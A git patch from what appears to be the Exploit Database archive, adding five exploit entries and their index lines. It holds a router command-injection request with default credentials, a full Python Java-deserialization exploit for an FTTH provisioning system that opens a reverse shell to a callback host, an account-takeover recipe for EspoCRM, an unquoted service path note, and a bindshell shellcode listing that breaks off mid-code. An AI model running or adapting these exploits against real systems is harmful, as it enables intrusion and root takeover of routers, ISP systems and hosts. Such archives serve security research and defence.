From 7b87f30fbc6b26b55e0841b8129656ae17402c9f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 25 Apr 2020 05:01:51 +0000 Subject: [PATCH] DB: 2020-04-25 5 changes to exploits/shellcodes Popcorn Time 6.2 - 'Update service' Unquoted Service Path EspoCRM 5.8.5 - Privilege Escalation Edimax EW-7438RPn 1.13 - Remote Code Execution Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) --- exploits/hardware/webapps/48377.txt | 75 ++++++ exploits/java/webapps/48380.txt | 338 ++++++++++++++++++++++++++++ exploits/multiple/webapps/48376.txt | 40 ++++ exploits/windows/local/48378.txt | 37 +++ files_exploits.csv | 4 + files_shellcodes.csv | 1 + shellcodes/linux/48379.c | 194 ++++++++++++++++ 7 files changed, 689 insertions(+) create mode 100644 exploits/hardware/webapps/48377.txt create mode 100644 exploits/java/webapps/48380.txt create mode 100644 exploits/multiple/webapps/48376.txt create mode 100644 exploits/windows/local/48378.txt create mode 100644 shellcodes/linux/48379.c diff --git a/exploits/hardware/webapps/48377.txt b/exploits/hardware/webapps/48377.txt new file mode 100644 index 000000000..6d6bf69e5 --- /dev/null +++ b/exploits/hardware/webapps/48377.txt @@ -0,0 +1,75 @@ +# Exploit Title: Edimax EW-7438RPn 1.13 - Remote Code Execution +# Date: 2020-04-23 +# Exploit Author: Besim ALTINOK +# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ +# Version:1.13 +# Tested on: Edimax EW-7438RPn 1.13 Version + +------ + +NOTE: This device configurated with root permissions. So you can run the +command as root + +Here is the detail(s) of the RCE(s) + +1- Content of the mp.asp file + +
+   +   +   +
+ +RCE Detail: +------------------------------- + +POST /goform/mp HTTP/1.1 +Host: 192.168.2.2 +User-Agent: Mozilla/5.0 ********************* +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 25 +DNT: 1 +Authorization: Basic YWRtaW46MTIzNA== +Connection: close +Cookie: language=1 +Upgrade-Insecure-Requests: 1 + +command=||busybox+ls&getID= + +------------------------------- + +2- Content of the syscmd.asp + +
+ +This page can be used to run target system command. +
+ + + + + +RCE Detail: +------------------------------- + +POST /goform/formSysCmd HTTP/1.1 +Host: 192.168.2.2 +User-Agent: Mozilla/5.0 ********************* +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 11 +DNT: 1 +Authorization: Basic YWRtaW46MTIzNA== +Connection: close +Cookie: language=1 +Upgrade-Insecure-Requests: 1 + +sysCmd="command to here" \ No newline at end of file diff --git a/exploits/java/webapps/48380.txt b/exploits/java/webapps/48380.txt new file mode 100644 index 000000000..6bc0a0374 --- /dev/null +++ b/exploits/java/webapps/48380.txt @@ -0,0 +1,338 @@ +# Exploit Title: Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution +# Date: 2020-04-24 +# Vendor Homepage: https://www.tecnoredsa.com.ar +# Exploit Authors: LiquidWorm +# Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe +# Version: 2.8.1 +# CVE : N/A + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# +# +# Furukawa Electric ConsciusMAP 2.8.1 Java Deserialization Remote Code Execution +# +# +# Vendor: Furukawa Electric Co., Ltd. | Tecnored SA +# Product web page: https://www.furukawa.co.jp | https://www.tecnoredsa.com.ar +# Affected version: APROS Evolution | 2.8.1 +# FURUKAWA | 2.7.10 +# ConsciusMAP | 2.6.4 +# | 2.3.1 +# | 2.1.49 +# | 2.1.36 +# | 2.1.31 +# | 2.1.18 +# | 2.1.16 +# | 2.1.15 +# | 2.1.1 +# | 2.0.1174 +# | 1.8 +# | 1.4.70 +# +# Summary: Apros Evoluation / Furukawa / ConsciusMap is the Tecnored +# provisioning system for FTTH networks. Complete administration of +# your entire external FTTH network plant, including from the ONUs +# installed in each end customer, to the wiring and junction boxes. +# Unify all the management of your FTTH network on a single platform. +# Unify all your data, whether from customers, your network, or the +# external plant in one place. APROS FTTH allows you to manage your +# entire FTTH network in a simple and globalized way with just one +# click, without being a network expert. Includes services such as: +# bandwidth limitation, Turbo Internet for time plans, BURST Internet, +# QinQ for companies, and many more. General consumption graphics and +# per customer in real time. Captive Portal for cutting or suspension +# of the service. +# +# Desc: The FTTH provisioning solution suffers from an unauthenticated +# remote code execution vulnerability due to an unsafe deserialization +# of Java objects (ViewState) triggered via the 'javax.faces.ViewState' +# HTTP POST parameter. The deserialization can cause the vulnerable JSF +# web application to execute arbitrary Java functions, malicious Java +# bytecode, and system shell commands with root privileges. +# +# =================================================================== +# $ ./furukawa.py 172.16.0.1:8080 172.168.0.200 4444 +# [*] Setting up valid URL path +# [*] Starting callback listener child thread +# [*] Starting handler on port 4444 +# [*] Sending serialized object +# [*] Connection from 172.16.0.1:48446 +# [*] You got shell! +# tomcat7@zslab:/var/lib/tomcat7$ id +# uid=114(tomcat7) gid=124(tomcat7) grupos=124(tomcat7),1003(furukawa) +# tomcat7@zslab:/var/lib/tomcat7$ sudo su +# id +# uid=0(root) gid=0(root) grupos=0(root) +# exit +# tomcat7@zslab:/var/lib/tomcat7$ exit +# *** Connection closed by remote host *** +# =================================================================== +# +# Tested on: Apache Tomcat/7.0.68 +# Apache Tomcat/7.0.52 +# Apache MyFaces/2.2.1 +# Apache MyFaces/2.1.17 +# Apache MyFaces/2.0.10 +# GNU/Linux 4.4.0-173 +# GNU/Linux 4.4.0-137 +# GNU/Linux 4.4.0-101 +# GNU/Linux 4.4.0-83 +# GNU/Linux 3.15.0 +# GNU/Linux 3.13.0-32 +# PrimeFaces/4.0.RC1 +# Apache-Coyote/1.1 +# ACC Library 3.1 +# Ubuntu 16.04.2 +# Ubuntu 14.04.2 +# Java/1.8.0_242 +# Java/1.8.0_181 +# Java/1.8.0_131 +# Java/1.7.0_79 +# MySQL 5.7.29 +# MySQL 5.7.18 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# Macedonian Information Security Research and Development Laboratory +# Zero Science Lab - https://www.zeroscience.mk - @zeroscience +# +# +# Advisory ID: ZSL-2020-5565 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5565.php +# +# CVE ID: CVE-2020-12133 +# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-12133 +# +# +# 24.02.2020 +# + +import os############# +import sys############ +import gzip#######o### +import zlib########### +import socket######### +import base64######### +import urllib######### +import requests####### +import telnetlib###### +import threading###### +import subprocess##### + +from io import BytesIO +from time import sleep +from flash import blic + +class Optics: + + def __init__(self): + self.callback = None# + self.headers = None## + self.payload = None## + self.target = None### + self.lport = None#### + self.path = None##### + self.cmd = None###### + + def allears(self): + telnetus = telnetlib.Telnet() + print("[*] Starting handler on port {}".format(self.lport)) + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(("0.0.0.0", self.lport)) + while True: + try: + s.settimeout(8) + s.listen(1) + conn, addr = s.accept() + print("[*] Connection from {}:{}".format(addr[0], addr[1])) + telnetus.sock = conn + except socket.timeout as p: + print("[!] Probably not vulnerable... ({poraka})".format(poraka=p)) + print("[+] Check your port mappings.") + s.close() + exit(0) + break + + print("[*] You got shell!") + + # + # UnicodeDecodeError dirty fix: + # /usr/lib/python3.6/telnetlib.py + # Change from 'ascii' to 'utf-8' (Lines: 553 and 556) + # + + telnetus.interact() + conn.close() + + def thricer(self): + print("[*] Starting callback listener child thread") + konac = threading.Thread(name="ZSL", target=self.allears) + konac.start() + sleep(1) + self.gadget() + + def gadget(self): + self.cmd = "/bin/bash -c /bin/bash${IFS}-i>&/dev/tcp/" + self.cmd += self.callback + self.cmd += "/" + self.cmd += str(self.lport) + self.cmd += "<&1" + + payload = b"\xAC\xED\x00\x05\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C" + payload += b"\x2E\x48\x61\x73\x68\x53\x65\x74\xBA\x44\x85\x95\x96\xB8\xB7\x34\x03" + payload += b"\x00\x00\x78\x70\x77\x0C\x00\x00\x00\x02\x3F\x40\x00\x00\x00\x00\x00" + payload += b"\x01\x73\x72\x00\x34\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63" + payload += b"\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E" + payload += b"\x73\x2E\x6B\x65\x79\x76\x61\x6C\x75\x65\x2E\x54\x69\x65\x64\x4D\x61" + payload += b"\x70\x45\x6E\x74\x72\x79\x8A\xAD\xD2\x9B\x39\xC1\x1F\xDB\x02\x00\x02" + payload += b"\x4C\x00\x03\x6B\x65\x79\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61" + payload += b"\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C\x00\x03\x6D\x61\x70\x74" + payload += b"\x00\x0F\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x4D\x61\x70\x3B" + payload += b"\x78\x70\x74\x00\x26\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x69\x74\x68" + payload += b"\x75\x62\x2E\x63\x6F\x6D\x2F\x6A\x6F\x61\x6F\x6D\x61\x74\x6F\x73\x66" + payload += b"\x2F\x6A\x65\x78\x62\x6F\x73\x73\x20\x73\x72\x00\x2A\x6F\x72\x67\x2E" + payload += b"\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F" + payload += b"\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6D\x61\x70\x2E\x4C\x61\x7A" + payload += b"\x79\x4D\x61\x70\x6E\xE5\x94\x82\x9E\x79\x10\x94\x03\x00\x01\x4C\x00" + payload += b"\x07\x66\x61\x63\x74\x6F\x72\x79\x74\x00\x2C\x4C\x6F\x72\x67\x2F\x61" + payload += b"\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C" + payload += b"\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72" + payload += b"\x6D\x65\x72\x3B\x78\x70\x73\x72\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61" + payload += b"\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65" + payload += b"\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43" + payload += b"\x68\x61\x69\x6E\x65\x64\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72" + payload += b"\x30\xC7\x97\xEC\x28\x7A\x97\x04\x02\x00\x01\x5B\x00\x0D\x69\x54\x72" + payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x73\x74\x00\x2D\x5B\x4C\x6F\x72" + payload += b"\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F" + payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73" + payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x75\x72\x00\x2D\x5B\x4C\x6F\x72" + payload += b"\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E" + payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x54\x72\x61\x6E\x73" + payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\xBD\x56\x2A\xF1\xD8\x34\x18\x99\x02\x00" + payload += b"\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3B\x6F\x72\x67\x2E\x61\x70" + payload += b"\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C" + payload += b"\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E" + payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D" + payload += b"\x65\x72\x58\x76\x90\x11\x41\x02\xB1\x94\x02\x00\x01\x4C\x00\x09\x69" + payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x71\x00\x7E\x00\x03\x78\x70\x76\x72" + payload += b"\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x52\x75\x6E\x74\x69" + payload += b"\x6D\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72" + payload += b"\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D" + payload += b"\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66" + payload += b"\x75\x6E\x63\x74\x6F\x72\x73\x2E\x49\x6E\x76\x6F\x6B\x65\x72\x54\x72" + payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x87\xE8\xFF\x6B\x7B\x7C\xCE\x38" + payload += b"\x02\x00\x03\x5B\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5B\x4C\x6A" + payload += b"\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C" + payload += b"\x00\x0B\x69\x4D\x65\x74\x68\x6F\x64\x4E\x61\x6D\x65\x74\x00\x12\x4C" + payload += b"\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B" + payload += b"\x5B\x00\x0B\x69\x50\x61\x72\x61\x6D\x54\x79\x70\x65\x73\x74\x00\x12" + payload += b"\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73" + payload += b"\x3B\x78\x70\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E" + payload += b"\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C" + payload += b"\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0A\x67\x65\x74\x52\x75" + payload += b"\x6E\x74\x69\x6D\x65\x75\x72\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\x6C" + payload += b"\x61\x6E\x67\x2E\x43\x6C\x61\x73\x73\x3B\xAB\x16\xD7\xAE\xCB\xCD\x5A" + payload += b"\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4D" + payload += b"\x65\x74\x68\x6F\x64\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72" + payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E" + payload += b"\x67\xA0\xF0\xA4\x38\x7A\x3B\xB3\x42\x02\x00\x00\x78\x70\x76\x71\x00" + payload += b"\x7E\x00\x1B\x73\x71\x00\x7E\x00\x13\x75\x71\x00\x7E\x00\x18\x00\x00" + payload += b"\x00\x02\x70\x75\x71\x00\x7E\x00\x18\x00\x00\x00\x00\x74\x00\x06\x69" + payload += b"\x6E\x76\x6F\x6B\x65\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72" + payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63" + payload += b"\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00" + payload += b"\x7E\x00\x18\x73\x71\x00\x7E\x00\x13\x75\x72\x00\x13\x5B\x4C\x6A\x61" + payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2" + payload += b"\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00" + payload += (bytes(chr(len(self.cmd)), "utf-8"))##################################" + payload += (bytes(self.cmd, "utf-8"))############################################" + payload += b"\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x01" + payload += b"\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x0F\x73\x72\x00\x11\x6A\x61" + payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\x74\x65\x67\x65\x72\x12\xE2" + payload += b"\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65" + payload += b"\x78\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D" + payload += b"\x62\x65\x72\x86\xAC\x95\x1D\x0B\x94\xE0\x8B\x02\x00\x00\x78\x70\x00" + payload += b"\x00\x00\x01\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E" + payload += b"\x48\x61\x73\x68\x4D\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00" + payload += b"\x02\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\x49\x00\x09" + payload += b"\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x78\x70\x3F\x40\x00\x00\x00\x00" + payload += b"\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78"#######" + + jbits = BytesIO() + with gzip.GzipFile(fileobj=jbits, mode="wb") as f: + f.write(payload) + serialize = base64.b64encode(jbits.getvalue()) + print("[*] Sending serialized object") + + self.headers = { + "Accept" : "text/html,application/xhtml+xml,application/xml;q=1.pwn", + "Content-Type" : "application/x-www-form-urlencoded", + "User-Agent" : "ISP-Eye/2.51", + "Connection" : "keep-alive"} + + self.paramz={"javax.faces.ViewState" : serialize} + #sleep(1) + r = requests.post(self.target + self.path, headers=self.headers, data=self.paramz) + + def par(self): + if len(sys.argv) != 4: + self.usage() + else: + self.target = sys.argv[1] + self.callback = sys.argv[2] + self.lport = int(sys.argv[3]) + if not "http" in self.target: + self.target = "http://{}".format(self.target) + + def check(self): + print("[*] Setting up valid URL path") + try: + r = requests.get(self.target) + app = r.text + if not "FURUKAWA" in app and not "APROS" in app: + print("[!] App not detected.") + exit(0) + if "FURUKAWA" in app: + self.path = "/FURUKAWA/" + elif "APROS" in app: + self.path = "/APROS/" + else: + exit(-1337) + except Exception as p: + print("[!] Somethingz wrong: \n--\n{poraka}".format(poraka=p)) + exit(0) + + def framed(self): + naslov = """ + o===--------------------------------------===o + | | + | Furukawa Electric / Tecnored | + | APROS Evolution | FURUKAWA | ConsciusMAP | + | Fiber-To-The-Home (FTTH) | + | | + | Java Deserialization Remote Code Execution | + | ZSL-2020-5565 | + | | + o===--------------------------------------===o + || + || + (\__/)|| + (•ㅅ•)|| + /   づ| + """ + print(naslov) + + def usage(self): + self.framed() + print("Usage: ./furukawa.py ") + print("Example: ./furukawa.py 172.16.0.1:8080 172.16.0.200 4444\n") + exit(0) + + def main(self): + self.par()########() + self.check()######() + self.thricer()####() + +if __name__ == '__main__': + Optics().main() \ No newline at end of file diff --git a/exploits/multiple/webapps/48376.txt b/exploits/multiple/webapps/48376.txt new file mode 100644 index 000000000..af82da422 --- /dev/null +++ b/exploits/multiple/webapps/48376.txt @@ -0,0 +1,40 @@ +# Exploit Title: EspoCRM 5.8.5 - Privilege Escalation +# Author: Besim ALTINOK +# Vendor Homepage: https://www.espocrm.com +# Software Link: https://www.espocrm.com/downloads/EspoCRM-5.8.5.zip +# Version: v5.8.5 +# Tested on: Xampp +# Credit: İsmail BOZKURT + +------------- + +Details: +-------------------------------------------- + +1- When we sent a request to the /api/v1/App/user, we can see user details +--- +First Request: +--------------------------- +GET /api/v1/App/user HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 ************************* +Authorization: Basic ************************************* +Espo-Authorization: ************************************* +Espo-Authorization-By-Token: true +X-Requested-With: XMLHttpRequest +DNT: 1 +Connection: close +Cookie: auth-token-secret=cdc7f7*********************377; +auth-username=user1; auth-token=3a874a********************************48 +---- + +2- When we decode Basic Authorization and Espo-Authorization and change the +value with another username (like admin) in the first request, we can see +other user information and access like BOSS +---------- + +3- Some Examples and encode technique + +- BASE64: +First type: dXNlcjE6MQ== (user1:1) +Second type: user1:MzNmYzYwZDQ1ZDI2YWNhODYxZTZlYjdiMDgwMjk4TkRn (user1:pass) \ No newline at end of file diff --git a/exploits/windows/local/48378.txt b/exploits/windows/local/48378.txt new file mode 100644 index 000000000..68c3eb333 --- /dev/null +++ b/exploits/windows/local/48378.txt @@ -0,0 +1,37 @@ +# Exploit Title: Popcorn Time 6.2 - 'Update service' Unquoted Service Path +# Date: 2020-04-24 +# Vendor Homepage: https://getpopcorntime.is +# Exploit Authors: Uriel Yochpaz & Jonatan Schor +# Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe +# Version: 6.2.1.14 and probably prior versions +# Tested on: Windows 10, 7 +# CVE : N/A + +[+] Description: +Popcorn Time For Windows installs as a service with an unquoted +service path running with SYSTEM privileges. +This could potentially allow an authorized but non-privileged local +user to execute arbitrary code with elevated privileges on the system. + +[+] POC: +C:\Users\User>sc qc "Update service" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: Update service + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Popcorn Time\Updater.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Update service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +[+] Exploit: +A successful attempt would require the local user to be able to insert their +code in "Program files (x86)" (popcorn.exe) or "C:\" (program.exe) +folders undetected by the OS or other security applications +where it could potentially be executed during application startup or reboot. +If successful, the local user's code would execute with the elevated privileges +of the application. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 5b809e378..b1b0f9065 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11038,6 +11038,7 @@ id,file,description,date,author,type,platform,port 48352,exploits/windows/local/48352.txt,"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path",2020-04-20,boku,local,windows, 48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris, 48364,exploits/windows/local/48364.py,"RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)",2020-04-22,"Felipe Winsnes",local,windows, +48378,exploits/windows/local/48378.txt,"Popcorn Time 6.2 - 'Update service' Unquoted Service Path",2020-04-24,"Uriel Yochpaz",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42611,3 +42612,6 @@ id,file,description,date,author,type,platform,port 48372,exploits/php/webapps/48372.txt,"Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)",2020-04-23,Besim,webapps,php, 48373,exploits/cgi/webapps/48373.rb,"Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)",2020-04-23,"Dhiraj Mishra",webapps,cgi, 48375,exploits/ios/webapps/48375.txt,"Sky File 2.1.0 iOS - Directory Traversal",2020-04-23,Vulnerability-Lab,webapps,ios, +48376,exploits/multiple/webapps/48376.txt,"EspoCRM 5.8.5 - Privilege Escalation",2020-04-24,Besim,webapps,multiple, +48377,exploits/hardware/webapps/48377.txt,"Edimax EW-7438RPn 1.13 - Remote Code Execution",2020-04-24,Besim,webapps,hardware, +48380,exploits/java/webapps/48380.txt,"Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution",2020-04-24,LiquidWorm,webapps,java, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index f62afe4be..e6ca9e5cc 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1020,3 +1020,4 @@ id,file,description,date,author,type,platform 48243,shellcodes/linux/48243.txt,"Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux 48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64 48355,shellcodes/windows/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows +48379,shellcodes/linux/48379.c,"Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux diff --git a/shellcodes/linux/48379.c b/shellcodes/linux/48379.c new file mode 100644 index 000000000..72e38e10d --- /dev/null +++ b/shellcodes/linux/48379.c @@ -0,0 +1,194 @@ +## Exploit Title: Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) +## Exploit Author: Bobby Cooke +## Date: 2020-04-23 +## Tested on: Linux x86_64 SMP Debian 5.3.15-1kali1 +## SLAE/Student ID: PA-10913 +## Course: This shellcode was created for the x86_64 Assembly Language and Shellcoding on Linux (SLAE64) Course offered at pentesteracademy.com. +## Description: Dynamic, Null-free shellcode that spawns a bindshell on TCP port 4444; on all the network interfaces of the host. The bindshell is password protected. The password 'P3WP3Wl4ZerZ' must be entered before execve will spawn a bash shell for the connecting client. +## Example: +# user$ nc 127.0.0.1 4444 +# M@G1C WOrDz IZ??asd +# REALLY?!M@G1C WOrDz IZ??P3WP3Wl4ZerZ +# id +# uid=0(root) gid=0(root) groups=0(root) + +; int ipv4Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); +; rax = 0x29 ; rdi = 0x2 = AF_INET +; rsi = 0x1 = SOCK_STREAM ; rdx = 0x0 = IPPROTO_IP +xor rsi, rsi ; clear rsi +mul rsi ; clear rax, rdx ; rdx = 0x0 = IPPROTO_IP +add al, 0x29 ; rax = 0x29 = socket syscall +inc rsi ; rsi = 0x1 = SOCK_STREAM +push rsi +pop rdi ; rdi = 0x1 +inc rdi ; rdi = 0x2 = AF_INET +syscall ; socket syscall ; RAX returns socket File-Descriptor + +; bind(ipv4Socket, (struct sockaddr*) &ipSocketAddr, sizeof(ipSocketAddr)); +; rax = 0x31 ; rdi = 0x3 = ipv4Socket +; rsi = &ipSocketAddr ; rdi = 0x10 +; 02 00 11 5c 00 00 00 00 00 00 00 00 00 00 00 00 +; Address-Family| PORT| IP Address| 8 bytes of zeros +xchg rdi, rax ; RDI = sockfd / ipv4Socket +xor rax, rax +add al, 0x31 ; rax = 0x31 = socket syscall +push rdx ; 8 bytes of zeros for second half of struct +push dx ; 4 bytes of zeros for IPADDR_ANY +push dx ; 4 bytes of zeros for IPADDR_ANY +push word 0x5c11 ; push 2 bytes for TCP Port 4444 +inc rdx +inc rdx ; rdx = 0x2 ; dx = 0x0002 +push dx ; 0x2 = AF_INET +add dl, 0xe ; rdi = 0x10 = sizeof(ipSocketAddr) +mov rsi, rsp ; rsi = &ipSocketAddr +syscall + +; int listen(int sockfd, int backlog); +; rax = 0x32 = listen syscall +; rdi = sockfd = 0x3 = ipv4Socket ; rsi = backlog = 0 +xor rax, rax +add al, 0x32 ; listen syscall +xor rsi, rsi ; backlog = 0x0 +syscall + +;accept +; rax = 0x2b ; rdi = sockfd = 0x3 = ipv4Socket +; rsi = 0x0 ; rdx = 0x0 +xor rax, rax +push rax +push rax +pop rdx +pop rsi +add al, 0x2b ; accept syscall +syscall ; accept returns client socket file-descriptor in RAX + +; dup2 +xchg rdi, rax ; RDI = sockfd / ClientSocketFD +xor rsi, rsi +add dl, 0x3 ; Loop Counter +dup2Loop: +xor rax, rax +add al, 0x21 ; RAX = 0x21 = dup2 systemcall +syscall ; call dup2 x3 to redirect STDIN STDOUT STDERR +inc rsi +cmp rsi, rdx ; if 2-STDERR, end loop +jne dup2Loop + +jmp short password + +failer: +; write +; rax = 0x1 ; rdi = fd = 0x1 STDOUT +; rsi = &String ; rdx = sizeof(String) +; String = "REALLY?!" +; !?YLLAER : 213f594c4c414552 +xor rdi, rdi +mul rdi +push rdi +pop rsi +push rsi +mov rsi, 0x213f594c4c414552 +push rsi +mov rsi, rsp ; rsi = &String +inc rax ; rax = 0x1 = write system call +mov rdi, rax +add rdx, 16 ; 16 bytes / size of string +syscall + +password: +; write +; rax = 0x1 ; rdi = fd = 0x1 STDOUT +; rsi = &String ; rdx = sizeof(String) +; String = "M@G1C WOrDz IZ??" +; ??ZI zDr : 3f3f5a49207a4472 +; OW C1G@M : 4f5720433147404d +xor rdi, rdi +mul rdi +push rdi +pop rsi +push rsi +mov rsi, 0x3f3f5a49207a4472 ; ??ZI zDr +push rsi +mov rsi, 0x4f5720433147404d ; OW C1G@M +push rsi +mov rsi, rsp ; rsi = &String +inc rax ; rax = 0x1 = write system call +mov rdi, rax +add rdx, 16 ; 16 bytes / size of string +syscall + +; read 